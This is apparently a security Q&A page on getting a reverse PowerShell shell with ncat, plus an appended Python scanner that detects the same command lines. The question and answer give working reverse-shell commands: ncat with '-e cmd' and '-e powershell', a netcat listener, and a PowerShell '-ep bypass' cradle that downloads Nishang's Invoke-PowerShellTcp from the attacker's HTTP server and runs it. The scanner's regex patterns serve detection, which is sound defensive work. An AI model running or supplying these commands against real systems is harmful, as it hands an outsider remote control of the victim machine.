How to execute a reverse "Powershell shell" using ncat or netcat?
I am using ncat to execute a reverse "cmd" shell from one machine to another without any issues, using the commands:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd
And it all works flawlessly. However, I would very much prefer "powershell" to be executed instead of "cmd", so I did this:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell
But now a strange thing happens: the PowerShell prompt is given to the remote machine and not to mine... This is the output:
In my machine:
Windows PowerShell
Copyright 2009 Microsoft Corporation. All rights reserved.
(and it hangs there)
In the remote machine:
PS C:\Users\User>
(the shell is actually given to the remote machine)
Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(
Any help would be very much appreciated.
The reason that PowerShell hangs on the reverse shell of your attacking machine might be that it is not fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run an HTTP server for the remote host to download the script from, then download it on the remote machine.
Set up an HTTP server on your attacking machine using either Python 2 or Python 3:
python -m SimpleHTTPServer [port1]
python3 -m http.server [port1]
Also on your attacking machine, run a netcat listener:
nc -lnvp [port2]
Then run this in the Command Prompt (cmd) of the remote machine:
powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"
The caught reverse shell on your netcat should now be fully interactive.
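Added example from the defender's side (not part of the question or the answer above): a small Python scanner that flags process-creation records whose command line matches the patterns shown on this page (ncat with -e cmd/powershell, the powershell -nop -ep bypass download cradle, and Invoke-PowerShellTcp -Reverse). The "pid|image|cmdline" record format and the sample events are constructed for this example; it also accepts the long-form -ExecutionPolicy spelling, which the page does not show.

```python
import re

# Indicators derived from the command lines quoted on this page (assumptions
# of this example, not a vendor ruleset). All matches are case-insensitive.
INDICATORS = {
    "ncat_exec_shell": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+(?:cmd|powershell)", re.I),
    "ps_bypass_download_cradle": re.compile(
        r"powershell(?:\.exe)?.*-e(?:p|xecutionpolicy)\s+bypass"
        r".*(?:\biex\b|Invoke-Expression).*DownloadString", re.I),
    "invoke_powershelltcp": re.compile(r"Invoke-PowerShellTcp\b.*-Reverse", re.I),
}

# Constructed sample of process-creation records: "pid|image|cmdline".
SAMPLE_EVENTS = [
    "4412|C:\\Tools\\ncat.exe|ncat 192.0.2.10 443 -e powershell",
    "4420|C:\\Windows\\System32\\cmd.exe|cmd /c dir",
    "4431|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -nop -ep bypass -c \"iex ((New-Object Net.WebClient)"
    ".DownloadString('http://192.0.2.10:8000/Invoke-PowerShellTcp.ps1'));"
    "Invoke-PowerShellTcp -Reverse -IPAddress 192.0.2.10 -Port 443\"",
    "4440|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -Command Get-Process",
]


def classify_command_line(cmdline):
    """Return the names of all indicators matched by one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan_process_events(lines):
    """Parse 'pid|image|cmdline' records; return (pid, image, hits) for each
    record that matched at least one indicator. The command line may itself
    contain '|', so only the first two separators are split on."""
    findings = []
    for line in lines:
        pid, image, cmdline = line.split("|", 2)
        hits = classify_command_line(cmdline)
        if hits:
            findings.append((int(pid), image, hits))
    return findings


if __name__ == "__main__":
    for pid, image, hits in scan_process_events(SAMPLE_EVENTS):
        print(f"pid {pid} ({image}): {', '.join(hits)}")
```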